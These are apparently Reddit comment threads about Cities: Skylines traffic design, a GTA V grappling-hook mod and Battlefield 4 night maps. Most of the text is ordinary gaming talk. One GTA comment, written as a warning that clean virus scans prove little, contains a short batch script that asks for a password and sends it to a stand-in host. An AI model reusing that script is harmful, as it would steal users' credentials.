Still a fantastic game, though. I'm really looking forward to trying out this update. Maybe you're just good at the game because I certainly had traffic issues as I grew.  Seems like I just can't find a good way to keep traffic flowing from my industrial sector to the highway without causing backups.  I definitely had some issues as I grew. There was just a point where it seemed to level off and no longer cause problems. Maybe related to some of the limitations posted by the other comments. I think I noticed the problems subsiding somewhere around the 100k mark but I can't recall specifics.  Have you tried adding a train connection?  I always found that you had to make industrial sectors in a very odd way in order for them to flow back into regular traffic correctly. [This is the setup I use.](http://steamcommunity.com/sharedfiles/filedetails/?id=436422103) The way it works is that each of the roads that the industry is built on are one way roads that direct the flow of traffic to the highway in the center. This provides the trucks with a quick exit to the main highway and helps keep traffic moving. The off ramps you see on either side of the center highway are to reduce the amount of traffic piling up as more cars get on the highway. The off ramps you see leading off in different directions are to allow trucks that have to visit multiple industrial areas (as in the case of forest industry) to move to their destination without clogging up the main highway. Finally you may or may not be able to see it, but leading directly from the main highway and connected directly to the one way roads are highways that split the traffic heading into the industrial areas into groups that need to go specifically to one area, thus reducing the amount of traffic on each of these roads. 
This isn't a perfect system, however as it doesn't completely eliminate traffic and it does waste quite a lot of space, but I'm satisfied with it. As for how you're supposed to let it flow back into your city properly, have multiple entrances from the highway to your city. The AI works on a "quickest route to" basis and will gladly take a highway over an avenue that covers the same distance. There is a limit on the number of 'active' agents the game can process at once. If your city grows large enough that that number of agents doesn't represent a significant population, traffic will spread out and lessen. How big are we talking about? There's a point where the city just stops generating cars (65k cars). Takes a while to get to that point though.

Also if you have a lot of despawning cars, you might not be aware of your traffic issues! :P  So, I used to play a lot of Caesar III, Pharaoh, and Zeus and haven't found a game that really captured that same feel. The idea of watching the city grow, meeting the needs of the people etc. The Sim City debacle left a sour taste in my mouth.

Forgive my ignorance; I've only read bits and pieces of this game. Does Cities provide that same kind of experience? I'm very interested in getting back into this genre. Yes and no. Cities: Skylines is not equally focused on resource gathering and specific needs. It's much more about the overall simulation of your city, traffic planning, management and looking at the big picture.

Ever tried **Banished?** From the games you describe that sounds like it'd be a perfect fit for you :)

(Although I am pretty sure you'll like Skylines too, on its own merits) This is why people love you so much Moo :p Most phony (channeling my inner Caulfield) community managers would be like "YEAH, OUR GAME IS TOTALLY LIKE THIS." Instead you suggest another game. You're a good man Mooley Brown.  I forgot about that game. Thanks for the suggestion! I heard that it was incredibly unforgiving and tedious though. Granted, this was when it was first released so things very well could have changed by now.

Maybe I'm clouded by nostalgia but Caesar, Zeus etc. didn't feel tedious (or maybe complicated is what I'm trying to say) to me. You could just pick the game up and role with it. I like that. I'm interested in Cities, I'm just worried that it'll take too much time to learn and I'll lose interest. Is it complicated to get into if you haven't played this genre in a while? It's pretty harsh the first playthrough but you'll get on top of it pretty fast. Try the Colonial Charter mod, it adds a LOT of gameplay and depth.

If you're the guide type of person I recommend checking out how to do hunter-gatherer hubs that supply themselves. It's a pretty failsafe way to start your game without dying the first few years from hunger and cold.

I do get you, though. Cleopatra is my prime example of a game that has both immense depth and is easy to access. So many great memories. I wish someone remade them!

Cities isn't that hard to get into if you play slowly. Although your best bet is to come by our subreddit (/r/citiesskylines) and talk to the players. I've spent too much time with this game to be a fair judge. &gt; I do get you, though. Cleopatra is my prime example of a game that has both immense depth and is easy to access. So many great memories. I wish someone remade them!

Just add "TODO: Bother team about remaking Cleopatra in future expansion" to your list. :P Thanks for the info Moo! I'll swing by. Does your boss know you're promoting other games than C:S here? :D Have you ever seen Miracle on 34th Street? Being truthful and open with your potential customers is a great way to win them over. You may lose a sale here or there, but the trust you gain with other potential buyers is well worth it.

"You know, I would probably like Banished more, but /u/TotalyMoo is being really cool. I'll check out Skylines!"

You were probably just making a joke, but I'm sure some other people would be confused about his actions. &gt; You were probably just making a joke

I was, yeah. Thank you for plugging Banished!  I followed that game all the way through development and loved it.  It really pleases me when it gets a fair mention during the discussion of the genre, and esp. coming from you it's great to hear! &gt; I wish someone remade them!

CO's next game. Make it happen. This is not negotiable. &gt; I wish someone remade them!

Total conversion mod? DONT DO WHAT THE OTHER GUY SAID!

If you're playing banished, do not go to the subreddit to learn efficient ways to organize your resource allocation. The guys over there have got the game down to almost an exact science. I would really recommend waiting until ~10 cities on your own before you really start to iron out exact efficiencies. A lot of the fun in banished is the struggle where you end up in over your head and have to panic to find solutions.

This is just my opinion Also a fan of that series, you're making me miss them! (I do have Pharaoh from gog still...hmm)

As for Skylines, I wouldn't call it difficult to get in to. The basic gameplay is simple enough. Mastering certain aspects (traffic!) certainly take some time and experience though. Would absolutely recommend it for you though. Well, I'd recommend it to most gamers. And heck, look how awesome their community manager is ;) Fuck. A community manager who recommends another game? You at paradox rule.

Also, happy birth day, man/woman/cat/other! Dawn of Discovery/Anno would be up your alley.  Cities: Skylines is pretty strictly a city builder and the needs of your citizens are pretty minimal (water, electric, parks, RCI balance).  DoD/Anno has city building mechanics focused around resource collection, supply chain management, and production of goods for your citizens.   Anno is great. I know there was a lot of controversy with the UBI launcher but I believe they patched all of that out. Yeah, it's Ubi but no matter.  Dawn of Discovery is probably one of my favorite games of all time.  Great graphics, damn near perfectly enchanting art style across the UI down to the tiny details of the landscapes and buildings, great music, and really really quality and balanced gameplay.  2070 wasn't as good IMO, so I hope the devs are working on another game. Yea, after reading about it, this is what I was looking for. It looks like a modernized Caesar game. Thanks! Cities is more similar to Sim City than Caeser 3, Pharah and Zeus as it is about building a city than managing resources.

Have you tried Anno 2070? Haven't played that one either. I suppose there's more options than I thought. I'm just worried that it won't hold my attention. I like to have the ability to jump in, play for couple hours, and leave. Without hunting wiki pages to figure out how the game works. If you don't like the futuristic setting, there's also Anno 1404. Practically the same mechanics, and with the unofficial patch it's a great game, much like 2070.

Also no DRM like in 2070. (always online or else you're locked out of certain features, mainly the arc storage.)  Depending on their region it may be called Dawn of Discovery. Also steam has [Dawn of Discovery Gold for $15](http://store.steampowered.com/sub/3047/). Gold includes the Venice expansion which is pretty good as well. anno isn't particularly hard, it take a couple hour to get used to, but it's not that hard afterward Are services still traveling across entire maps even if a service nearby has available units? Yeah, my traffic problem is because of all the hospitals i have.

They should limit the ambulances to the district. Is there a specific reason that the European buildings are only available in the Euro biome? Are regular buildings not available in the Euro Biome? 

Would it be possible through asset manager to make a euro building available in a non euro biome and vice versa?  I've always wondered if there could be a real desert type map for the game. Rolling dunes, sand storms, camels, occasional palm trees. How the temperature can spike in the day and become freezing at night. Maybe setting up the pumping stations on the oasis, connected to one lowly river? That'd be a challenge. [deleted] [deleted] Did they improve/add (1) freeway ramps, (2) merge lanes, and (3) intersection lane, light, and sign control? (or are there mods that do so without issue?)

I absolutely loved the game on release but I seemed to run into those (or, the lack of them) so often that I just stopped playing until it's further developed. &gt; (3) intersection lane, light, and sign control? (or are there mods that do so without issue?)

There's a mod that gives you absolute control over these. I can't remember the name at the moment, but it lets you chose which roads have no sign/yield/stop, adjust the timing of the lights, and create/edit turn lanes. Traffic Manager http://steamcommunity.com//sharedfiles/filedetails/?id=427585724 This update is freaking awesome, I love this game! 

I was complaining about he lack of "tunnels" in this game and "Puff" this update comes &lt;3

Next wish upgradable buildings :P Nice the two thing I have been looking forward to are Helicopters (Medical, Police,...) and the other is Ireland being properly represented on the Union Jack.

At least one of those two things has been addressed:

Ireland is properly represented on the Union Jack I have never played a city sim before and have been considering this one, so I have two questions on it before I go ahead and buy it:

1. How long does it take to figure out? I'm definitely willing to learn, as I love CK2, but I don't want to really have to dig into youtube tutorials for a lot of things. Is it pretty intuitive?

2. Doesn't maintaining your city kinda feel like work? I've never played one, so that's why I ask, but it feels to me like optimizing and adding things to your city could eventually become something of a job. Does it stay fun? What keeps you playing? Or is it kinda like a job, but also have something of an intrinsic reward? Was easy for me to figure out, only city-builder I've ever played before was Anno 1404. Should I buy this game? Any plans to have this game on gog.com?  [Link to the wishlist](http://www.gog.com/wishlist/games/cities_skylines) :) I love the absurdity of the animation. 

I can just imagine the mod-maker being like, "eh, I tried," and even though the animation is janky as hell, functionally, the mod seems quite good. I don't even care about the animation.  The way Franklin is flailing around sort of works.  

What I wish is that the cable could interact with the environment, like trees or other cars.  I was a little disappointed that it just passed through everything.  If it were physical, you could do things like setting up a giant garrote on highway underpasses and such. I doubt it's possible, but I'll have to look into it later

Edit: also, I'm like 99% sure the rope is the same thing as the electrical lines running from the poles [deleted] I don't think you guys know too much about how games are made.

It's not an actual cable. The difference between making an object stay a certain distance from another object and making an object do that, but with lines that are not straight, and lines that interact with every single other object they pass, is insane. This mod is probably a few lines of code, what you're looking for would be significantly more.

The guy didn't just add a rope to the game and say "okay, here we go" and then it had performance issues so he told it "don't have physics like that". It's harder than that. You can't add a thing and it just plain works how it would in real life, you have to tell it to do that. [deleted] That would be way, way more work - at the moment, I'm pretty sure the way the mod works for anchoring two objects together is something like:

&gt; 1: When they're first attached together, set *d* to be the distance between the two objects at that time.
&gt;     
&gt; 2: If, at any point, the objects are further than *d* apart, then move them both towards each other until they're within *d* of each other.
&gt;     
&gt; 3: Also, render a rope between the two objects.

Which is, relatively speaking, not too tricky - #1 and #3 are probably a single line of code each, and #2 is maybe four or five lines (in practise, it's probably way more than these because you have to interact with the physics engine or whatever, but y'know).

But if you wanted the rope to interact with things, it'd have to be completely different: some kind of collision detection along the length of the rope? You'd need the rope to be able to bend, too, while at the moment it is rigid. It'd be a hell of a lot more work, and would require a much more intimate understanding of the physics engine.

The only way I can think of doing it without a huge amount more work is to have the rope actually be a "chain" of several dummy objects tethered together using the existing system, maybe a foot apart. But I don't think the physics engine would handle that very gracefully! &gt;The only way I can think of doing it without a huge amount more work is to have the rope actually be a "chain" of several dummy objects tethered together using the existing system, maybe a foot apart. But I don't think the physics engine would handle that very gracefully!


That is exactly how you would do it, the problem is you need a lot of dummy objects for the thing to work correctly otherwise it will pass between the objects. So you need possible hundreds of these objects which also means hundreds of new physics calculations happening constantly. It is just completely unrealistic for the current processing power we have.


Though you did give me an idea. I'm not sure it would work though.

 Whatever instead of a chain of objects you had a chain of event triggers between the two points. These would not require physics calculations. Whenever they come into contact with the world they would spawn physics objects which have their own ropes between them. If the triggers could react fast enough they should spawn on any object that comes into contact with the rope, then despawn once they are out of contact.

 In practice you would add some limitations so that the rope doesn't wrap around a pole and spawn a couple hundred objects anyway. It got me thinking when he was on the train. What would happen if one end was anchored to the moving train (which is indestructible and not movable from its set path) and the other end to another immovable object (like a tree or building)?  In that case, my guess is that the mod will treat them both as static objects (which they are), so it will make the not unreasonable assumption that neither one of them will be moving. End result, the rope stays attached to the tree at one end, with the other end floating in mid-air where it initially connected to the train. &gt; *2*. If, at any point, the objects are further than d apart, then move them both towards each other until they're within d of each other.  
  
Except velocity vectors and mass are taken into account as well. Notice how the building isn't moving when grappling towards it? Or how the train is able to pull the truck?  
  
&gt;You'd need the rope to be able to bend, too, while at the moment it is rigid. It'd be a hell of a lot more work, and would require a much more intimate understanding of the physics engine.  
  
You'd *just* need to find something that's already in the game and use that as your rope material. Something like cloth with infinite durability or something like that... I was simplifying; but yeah, they're probably just impelled towards each other using the physics engine. The mod only needs to interact with the physics engine, though, which will do all the actual work. The mod code probably looks something like "imbue object 1 with a force of 10 in the direction of object 2" and vice versa.

I don't know if mass is accounted for, though - I reckon the train and the buildings are "static" as far as the physics engine is concerned, so they're just handled differently in the mod's code - only move the non-static object towards the other. The train still counts as static, because here, "static" just means that the physics engine doesn't influence the object's position - it moves along the track at a set rate, and there's no way to influence its movement.

Cloth physics are usually optimised massively by making it so they can only interact with as few objects as possible; often only the player. I reckon that having a cloth object be able to interact with any object in the game would be really computationally expensive, and the idea of having two such cloth-ropes (or dozens!) interacting with each other is almost unthinkable! &gt; I reckon the train and the buildings are "static" as far as the physics engine is concerned, so they're just handled differently in the mod's code - only move the non-static object towards the other. The train still counts as static, because here, "static" just means that the physics engine doesn't influence the object's position - it moves along the track at a set rate, and there's no way to influence its movement.

This is exactly how it is. You're right on other parts as well. [deleted] Hopefully we'll have that in Just Cause 3. I was disappointed the same way in the actual JC2. Well it's the JC2 grappling hook, that one wasnt corporeal either. Let's just call it true to the original It's possible, but there is a lot of math involved that would slow down the game quite a bit I don't know much about.modding but this seems insanely difficult to pull off I do think, however, it's great how GTA V's physics engine adjusts to the new conditions. It does look a bit wonky at times, but the cars and people get pulled by the cord somewhat realistically. The only thing that looks of is the pulled animation of the player character, but that obviously is not part of the original game at all. It doesn't look like an animation. It looks like the modder just used ragdoll physics for that part. Yes, but there's almost certainly some sort of animation involved. That's Rockstar's sort of modus operandi. They use that "euphoria" physics... consultation? I don't know, code?

Anyway, there's almost always some sort of animated segue into the ragdoll.  He probably didn't make the animation. He just choose one that is already in the game. Yeah, its fucking hilarious. I was getting a: FULL. LIFE. CONSEQUENCES. feel from it. I would love to see a helicopter with a massive crowd of people just dangling beneath it. I'd call it the human wrecking ball :)  Or just attach them all to the end of the rotors... Can you do that? Time to find out Please follow up. Please. It's been 7 hours. I'm assuming it works and is so glorious /u/Mharbles has been flying a helicopter around [doing this. Maybe by the pier.](http://i.huffpost.com/gen/1341077/images/o-SWING-RIDE-CARNIVAL-facebook.jpg) Some say, if you squint at the sun just right on a warm Los Santos day, you can still to this day make out /u/mharbles flying, surrounded by a rapidly gyrating flurry of corpses.  I *NEED* to see this Well the rotors are physical objects (you can walk on them and get chopped up by them if hit while moving) so I'm gonna guess it'll work as long as it doesn't destroy them. More like a human o' nine-tail. [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] Incredible! For a game that has no official mod support, and the fact that the game has only been out for a couple of months, just shows how dedicated people are to this game, it's quite impressive. This is the best mod for GTAV so far, great work! I'm a bit out of the loop. What has rockstar said about official mod support? Why haven't they done it yet? If it's not too much trouble, could you give me a link? There is no official mod support and there never will be. It's very sticky to talk about because a lot of people think mods are like "oh it's just like skyrim" where there's an official mod toolkit and a way of implementing mods through scripts. There isn't in GTA5 and there won't be because there is no SDK and that cannot be made public by Rockstar due to licensing most likely.

The way GTA5 "mods" work is pretty much just code injection. Mods are more like just... trainers, pretty much. It's a lot more accurate to call these hacks instead of mods. Though obviously mods = modification the problem is gamers kind of have this separation attitude towards hacks and mods though, like if you have an aimbot in CSGO that's a hack, not a mod. If you have an armor piece in Skyrim, that's a mod.

Fundamentally the way GTA5 "mods" work is more akin to CSGO aimbots or wallhacks than actual Skyrim mods.

Hence why R* will not allow you to use these "mods/hacks" in online, because plain and simple it's code injection. And code injection is very, very bad. Ohh. I didn't know about the whole trainer thing. Now it all makes sense. And it seems like they're just afraid because of what happened before with the online money hacks and what not.. They're probably afraid that once they implement mods in single player, they won't be able to prevent them from popping up online. Makes sense, but I personally think that it wouldn't necessarily be a bad thing. When the money hacks came along on GTA Online, I was having more fun than ever. Once they went away, the game got boring and I never played again.. 

Most players on PC will be modding. Right? I know nothing about how a this works, so I might be talking out of my ass, but I think GTA Online might be more fun if people could make servers with mods. If everyone has access to mods, it wouldn't be that much of a problem. Except for crashes..

Anyway, thanks for your comment, I appreciate it.  It would be cool to see GTA Online have mods but R*'s anti-cheat is not versatile enough to differentiate between "fun" mods and "bad" mods. Maybe a whitelist would one day be possible and that might not be a bad idea at all but that's entirely up to Rockstar to mess with that and given their track record on modding (pretty much never supporting it despite it making them mucho bux back in vc/sa because of vc-mp and sa-mp). Theyre anal about it. That's the gist of it.  Rockstar is ok with mods in Singleplayer, but didn't and won't go out of its way to create an official modding API for the game. I guess they know that mods are going to pop up anyways and writing an official interface for them wasn't/isn't worth their time? They can't make an SDK due to licensing software, most likely.

GTA5 is one of the most technologically advanced games in terms of physics and architecture, it's not insane to believe they didn't make every single piece of the game from the physics engine to the lighting engine in house. Chances are they bought some stuff to make this game, especially since the game had a very small "development" budget in comparison to the money it made. What... what happens if you attach the train to the ground? /u/Lim3Fru1t just tried it.

https://www.youtube.com/watch?v=-syfOiSOvwc

In short, it doesn't affect the train at all. I wonder what would happen if you attach the train to a car and then the car to the ground. The train is clearly being moved on a preset path and not being simulated as are cars. Though it is still a present object in the physics sandbox (as you can get hit by it, attach cars to it, etc), it cannot be affected by outside physical forces. You can't slow it down, you can't stop it, you can't derail it or tip it over. One can presumably confirm this in-game by driving full speed with a semi into a train, which if I am correct would do nothing.  People have filled a train tunnel with a dozen buses and dump trucks lined up in a way that the train would compress them as it hit. Didn't affect the train in the slightest, but the mayhem is something to see.  [This](https://www.youtube.com/watch?v=eJWWOC67m9E) is probably the video you're referring to. That's the one! Love the achievement hunter guys.  Right, I assume nothing would happen to the train.  I'm wondering what would happen to the car. Oh, yeah, the video seemed to conveniently ignore that scenario. I have a feeling it either a) "snaps" one of the ropes (it disappears), b) rope stretches infinitely, or c) crashes.  Well that was dissapointing :( Maybe some day someone will mod the game so that trains can be derailed. Already possible. Search :) Not possible. Searched. [Seems like this mod allows you to derail.](https://www.gta5-mods.com/scripts/railroad-engineer) [deleted] Pair that with a never-ending easily-deployable parachute and we've got one of the best mods ever made. One of the best mods ever made is a stretch, defiantly the best mod for GTA V 

Edit: Why am I being downvoted? There's been tons of mods some have actually become huge standalone games like Dota and CS. This is just a grappling hook, it's awesome and cool but nowhere near a lot of other mods. [deleted] Yeah, sorry, that's what I meant. It would be up there still though. The world of GTA V would be awesome to just fly around with a parachute, grappling on to shit to gain speed. Don't apologize. You're entitled to your own opinion and this is an awesome mod. Obviously not the best, but it'd essentially merge two great games together. Just Cause 2 is great, but we don't remember the riveting storyline, we mostly remember the grappling hook and parachute. The graphics and destruction was nice too. I mostly remember the amazing voice acting.. [deleted] http://www.d-e-f-i-n-i-t-e-l-y.com/

http://dictionary.reference.com/browse/defiantly Too bad to get the mod you need to do those survey sites that want your phone number so they can charge you monthly for a service...

anyone have a mirror to it? Yeah, I got quite annoyed by it, too. Here is a mediafire link for you :) http://www.mediafire.com/download/cxc6vc8rig1dm6w/VJC2Mod.zip While this is nice - everyone needs to keep in mind and remember the mods just a week or two ago that had malware in them. It's best to get your mods from the source and if the source has a shitty host, let them know in the comments or forums or wherever it is.

I'm sure /u/vzw-Grey just downloaded and reuploaded, but it would be easy for someone to modify it to include malware or even package a different mod just named "VJC2Mod.zip" Yeah, that's true :l
Didn't really think about that.... MVP. Why the fuck do I need to give personal information to download a mod? That is awesome! It looks weird shooting from a pistol, but the ragdoll physics complements this mod very well! What's the Watch_Dogs mod? 

Also, I enjoyed how many games were in this title.  [Here's the mod](https://www.youtube.com/watch?v=vntTG3wRVyA) holy shit thats impressive So it turns GTA IV into Watch_Dogs? That's pretty neat.  Is this guy playing with some graphics mods? The depth of field and light effects are something I haven't seen in game and I play it on very high/ultra That's me playing and there's no graphics improvements, Post Processing is only on Very High not Ultra and DOF is on. Oh I didn't catch that, congrats on making an amazing mod! I think I have my post processing on high since it's a bit of a frame killer. I'll have to have a look through my settings. Thanks! Don't thank me, JulioNIB is the creator. He's made some pretty awesome mods for GTA IV in the past. Ah my mistake, I assumed the video uploader was the mod creator.  Is it? I have it on ultra with a 7870 and I stay between 40-60. If I can get 55+ on high I'm going to slap myself I can set it to whatever and it doesn't seem to affect performance at all. So I have it set to ultra now, looks neat.

I'm using a HD7970GHz. [deleted] [deleted] This video, while as awesome as it was, just reminded me that someone (preferably more skilled with computers than I) needs to mod the trains to fix them. And by fix them, I mean dislodge them from the tracks and make them "drivable" and capable of being stopped/derailed. You know, like they were in San Andreas. [There already is.](https://www.gta5-mods.com/scripts/railroad-engineer) I have yet to get gta v on pc but any news on having multiplayer + mods?  If you use mods online, you get a temporary ban of 2 weeks. If they decide to let you host personal servers, maybe mods will be ok that way.  Otherwise I think most of the community looks down upon all mods for online gaming because most people end up exploiting it.  They won't "allow" that however there are already a few promising modding projects to make it happen anyway. Example: /r/fivem. [deleted] How long can it be? There's a Just Cause 2 mod that makes it 2 km long. thats the greatest!   It doesn't go THAT long, maybe about 100 yards? [deleted] While it looks really cool and fun, I'm still hesitant to try out any mods, seeing as how plenty of people have just gotten straight up banned because of them. Is this still a thing or are singleplayer mods safe to use now? Singleplayer mods were never a problem, it's only an issue if you go online with them activated.  [deleted] that chat noise was freaking me out. who the hell chats me at 8am? Holy crap this works well. Speaking of that watch dogs mod, think that could come to GTA V? Could it? Yes. Will it? Probably not. Watch dogs was the neatest idea when it first came out, but it's old now and i doubt any modder would put that much time into something that's not really relevant anymore. As cool as this is, I feel like this is a good point to remind people that a popular mod a couple weeks ago had a keylogger(or some malware can't remember) installed with it.

Make sure you vet this one out, or be prepared to get burned if you want to take the risk.

There is no "safe" mod at this point, we don't know how much control mods have in this game, it is very new and anything someone tells you should be taken with a grain of salt. Even what I am saying right now, and now, and now, and now, shit I have to go to work.

Even if someone seems smart and says it is safe, if you don't understand what they are talking about, there is no way to tell if they are being honest or if THEY even know what they are talking about.

I am not saying don't mod. Just be careful and be aware of the risks. If the risk is worth it and you are not worried about malware, then by all means, or if you think I am being needlessly cautious, that is very probably true. Does this mod have a virus in it? Thats the only thing stopping me from downloading it. I want a confirmation before i grab it.
 [It's clean](https://www.virustotal.com/en/file/d6f532fc5358003ca505704d43312fb573ae7f0be9a408622df61a7ccc310f61/analysis/) So is this:

    @echo off
    set /p PASS=Please enter your password:
    start /min iexplore http://www.takeyourpass.com/?pass=%PASS%

Malware and viruses scans are all well and good, but nothing will prevent a program from doing bad things in the correct way. Doesn't really prove anything.  Wonder if source will be released  I'm now waiting with baited breath for a GTA V super hero mod. I haven't even purchased the game yet as I'm waiting for the first 25-50% off sale since I'm a broke college student, but a GTA V super hero mod would push me over the edge.

Here me out. 

Obviously this would need to take place in a parallel universe where super heroes exist within the realm of San Andreas and Rockstar allows private multiplayer servers with mods enabled.

Assuming both of those conditions are met, the possibilities are boundless. This mod gives me a very strong Spider-man vibe, but there are a number of heroes that use similar grappling tech for enhanced movement (Batman also comes to mind). Now add a mod which increases the hero's run or movements speed and now The Flash is here! Or a "flight" mod combined with the recently displayed Gravity gun mod and suddenly Superman has joined the partay!

I know I'm rambling here a bit, and I'm probably just describing what I remember from DC Universe: Online or some other failed super hero MMO, but these few early GTA V mods have me very excited about the possibilities and I can't wait to see what GTA V's ridiculously talented mod makers are working on next!

And now I must buy the game... another month of ramen noodles and kraft dinner won't kill me... will it? I'm sorely disappointed with Rockstar. I think it fairly likely that a mod like this would exist already if they didn't have their heads up their arses about supporting modding.  I don't know enough about Rockstar's stance on mods to really have an opinion, but based on the rumblings around here I assume they're very much focused on keeping mods out of the multiplayer game in order to ensure balance(?) and maximize their bottom line through in-game purchases. 

However, GTA 4 modders managed to do some pretty incredible things with that game, keeping it relevant for over half a decade while Rockstar got their shit together for GTA V. So maybe there's some hope they'll back off GTA V modders and allow them free rein to produce whatever their imaginations can fathom... maybe... eventually... Seeing the guy get dragged by the car reminded me of the lasso in red dead redemption.

Also, this is a neat way to perfect a burnout with a car. Does this work with GTAV Mod Manager? I've tried setting it up and all my other mods work, but this one doesn't seem to... Grappling hook mechanic + a zombie/infection game would most likely produce awesome results.

You would only have few melee weapons and 1 or 2 very rare handguns to kill the infected so you have to use the grappling hook to make them easier to kill by a) leashing them or b) connecting to another infected to cause havoc in a herd. Dying Light seems to have these things: a zombie game with a grappling hook and rare / limited guns. That steam ping had me wondering if my pc was about to crash since nothing popped up. Great mod though having the freedom from just cause 2 in the gta world is incredible  Is it the grappling mod that allows him to stay standing on moving vehicles? That was one of my main disappointments in GTAV. There should be a way to grab onto the roof or something and hang on. You would have to move with the car to stay on or be forced off. Maybe a way to shoot the driver through the roof and then hop in or something.  The FIB guys already have an animation of hanging onto the side, wouldnt be too hard to add this.  That animation exists for the player as well on some vehicles. When you grapple onto a car you can safely stand on it. But of course you can still get push off if the Driver hits something :p I never installed a mod before, how can I do this with gtav? I have it on steam  There should be a how-to where you download the files.  Usually just copy pasting the folders/files into A specific GTA DIRECTORY. Is it done through steam or 3d party site? **TL;DR**

1 new community map

Night Versions of (several) current Maps 

~~four~~ 5 new weapons

Gunmaster Game Mode

Former Battlefield Map Remade for BF4

 Night maps for free are awesome, something I always wanted in BF3.  I do remember there being a night-ish map in BF3. Tehran Highway if I'm not mistaken. Yeah, and the [Death Valley](http://battlefield.wikia.com/wiki/Death_Valley) map from the Armored Kill expansion. 

However, those were both normal maps with different lighting that simply made them a bit darker. In Death Valley, they used a bright full moon and cold blue/white light to create the illusion of darkness, even though it wasn't actually dark. 

These maps are different, however. They're based on the community fan-made conversions where the global lighting is turned off and so the maps are actually pitch black except for light sources like headlights, overhead lights, flares, gunfire, etc. 

They've made modifications to provide some global illumination and add lighting sources (because otherwise it's too dark to see anything most of the time), but they're actually mostly truly dark for the first time in the series' history - unlike the previous "dark" maps in BF3/BF2/BFBC2.  [deleted] Flashlight attachments sound so much more essential now. IR scopes and flares, my friend But if you are using IR scope you will be completely blinded by someone using lazer/tac light. It's going to be an interesting dynamic. I can't fucking wait for it! Flash *hiders* seem more essential now. Flash hiders shield the eyes of the shooter from flash of his own weapon firing. Everyone else can see it just fine. Right up until the point you realise you've put a great big "shoot me" beacon on your gun that can be seen across the map :p To be fair, that's what it's always been. Now it has a purpose *besides* that. Don't flashlights blind people within a certain range? I mean, it's not super useful, because they'll still know you're right in front of them, but if it works like I remember than it still has *a* use. They did in the early days of Battlefield 3, but people complained, so they nerfed it pretty hard. They've been useless for a while now. Except you can press T to turn it off! This is EXACTLY what Insurgency is like. No way, that would make you a huge target, IR scopes are the way to go. literally insurgency night maps. insurgency is so underrated imo Oh it's going to be BEAUTIFUL. I've been testing the maps in the CTE (community test environment) and they are simply stunning. 

Some early CTE night map gameplay, if you're interested: https://www.youtube.com/watch?v=gD9NNGu_0-o&amp;spfreload=10

Keep in mind they look even better now. (the lighting is odd, as this was a work in progress) :) When will we get this shit?? I can't wait! Would be neat if things like flares could set fire to long grass or certain buildings.  When the guy mentions the helicopter swooping down I completely expected the grass to catch fire. [Here's some beta gameplay](https://www.youtube.com/watch?v=HQAom0Bo-BU) from one of the maps, based on Siege of Shanghai (Infiltration of Shanghai)! It looks quite good. What about spotting?  Couldn't you just mash the spot button and put a little dorito on top of any otherwise hidden enemies? Maybe it could work like Gulf of Oman. When the sand storm hits, spotting distance is drastically reduced. Maybe they could add that shortened spotting mechanism to the night maps.       \\_()_/  Contrary to BF3, 3d spotting is "blockable" in BF4 by stuff like smoke, sand, distance etc. So it would easily be possible to reduce it. No. Spotting has been reworked specifically for night maps to avoid this issue! :) In both normal and hardcore mode. Dunno, I only play Hardcore and Classic because I think spotting has ruined the game. 

At least in BF2 when you spotted someone it provided a general area where they were in and no 3D Dorito, so the person still had the ability to quickly change position and flank. 

The new system is ridiculously cheap and completely breaks the game IMHO because no matter how good your teamwork or flanking is, it takes only one person spotting to alert the entire enemy team to you and your squad's presence, and I don't feel that's fair.  &gt; The new system is ridiculously cheap and completely breaks the game IMHO because no matter how good your teamwork or flanking is, it takes only one person spotting to alert the entire enemy team to you and your squad's presence, and I don't feel that's fair.

As if BF2 were so much different with commander spotting spam, UAV, *and* scan. I don't like 3D spotting either, but BF2's spotting implementation wasn't really much less cheap. If you had a good commander.  Uncommon on pubs, and as a result less cheap imo.  you play hardcore, so you shouldn't care.

most hardcore players enjoy hardcore 10x than normal. It's been a while since I read about the night maps but I don't think 3D spotting is removed by default.  Will long range scopes still have lens flares? That would make sniping pretty damn hard. No idea. I'd say the possibility is high. Sniper rifles in real life haven't had scope glints in years for the exact reason you see in Battlefield: it gives away the sniper's position. Real scopes use a slight coating to make the lens not reflect light back. 

So, they're in Battlefield like that to provide balance. I'd imagine they'll retain something like that in the night maps as well for the same reason - balance. 

As for where the light comes from - "the light of the moon" or "passing lights" from gunfire, flares, other lights, etc. will probably be the justification.  a Lot of them have that honeycomb structure over it to cut down on the solid color and protect the lens too. Yes, but they will be dulled and the intensity of the glare depends on the proximity to light sources.

(I've been playing the CTE test maps)  Damn makes me wanna buy it If you just want some night maps on a modern shooter, Insurgency has a ton of them that are pitch black as well.  No combined arms, though, and the maps are smaller. Insurgency is very good, but I wouldn't recommend it as a replacement for BF4. While Insurgency has some amazing gun mechanics and just the feel of the game is superb, BF4 still looks beautiful and combines infantry and vehicular combat, plus has more content like maps and guns. If you can, play both! Yeah, totally different vibe between the two. Insurgency's got this slower pace and ultra realist vibe about it, Battlefield's got a faster pace and non-stop action. Very very different games, both great. Tehran Highway I thought was the worst map in any BF game ever made. I consider Metro up there, myself. There's actually 5 new weapons. The AN-94, L86A2, Groza-1, Groza-4 &amp; Mares Leg. AN94 RETURNS!

I started playing BF4 again about two weeks ago after abandoning it 2 months or so after release and it is a far more enjoyable game than it was, glad that they've been keeping on top of it If you get Premium on PC you can join the Community test environment (CTE, has it's owns [subreddit](/r/Battlefield_4_cte)) and try out the new weapons, and see the new map in development.

It's one of the contributing things to why the game has improved so much since release. 

(Not sure if you already know about it, but just general information for those that don't) Wasn't aware that the CTE was premium only!

Unfortunately I'm on PS4 this time round. I think you can use the pc CTE if you have premium on console. Even PS4 and XB1 players who have premium can get access to the PC-CTE :) Yeah I quit in disgust after about eighteen hours upon release. Just started playing last month and it has been as fun as BC2 was so far except rush still sticks, but conquest is consistently amazing. Yeah Rush still isn't brilliant but the shooting especially is a lot better now, there's a lot less bullshots. &gt;AN-94

